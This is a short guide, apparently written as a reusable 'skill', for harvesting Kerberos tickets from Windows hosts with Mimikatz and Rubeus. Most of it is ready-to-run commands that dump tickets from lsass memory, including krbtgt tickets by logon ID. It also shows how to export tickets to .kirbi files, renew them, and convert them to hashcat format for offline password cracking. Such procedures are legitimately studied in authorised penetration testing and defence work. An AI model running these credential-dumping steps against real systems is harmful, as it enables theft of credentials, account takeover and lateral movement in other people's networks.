Kerberos Ticket Harvesting from Windows

This skill covers extracting and manipulating Kerberos tickets from Windows systems using industry-standard tools like Mimikatz and Rubeus.

Background

Tickets in Windows are managed and stored by the lsass (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system.

Tools Overview

Mimikatz

Mimikatz is a versatile tool that can interact with Windows security. It's used not only for extracting tickets but also for various other security-related operations.

Extract tickets using Mimikatz:

sekurlsa::tickets /export

Rubeus

Rubeus is a tool specifically tailored for Kerberos interaction and manipulation. It's used for ticket extraction and handling, as well as other Kerberos-related activities.

Dump all tickets:

.\Rubeus dump

Save a ticket to file:

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

List all tickets:

.\Rubeus.exe triage

Dump a specific ticket by LUID:

.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap

Save the specific ticket:

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

Renew a ticket:

.\Rubeus.exe renew /ticket:<BASE64_TICKET>

Convert a ticket to hashcat format for offline cracking:

.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Usage Notes

• Replace

  <BASE64_TICKET>

  with the actual Base64 encoded ticket string
• Replace

  <luid>

  with the actual Logon ID from the triage output
• Ensure you have appropriate privileges (administrative access extracts all tickets, non-admin users can only access their own)
• These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows

References

• How to Attack Kerberos - Tarlogic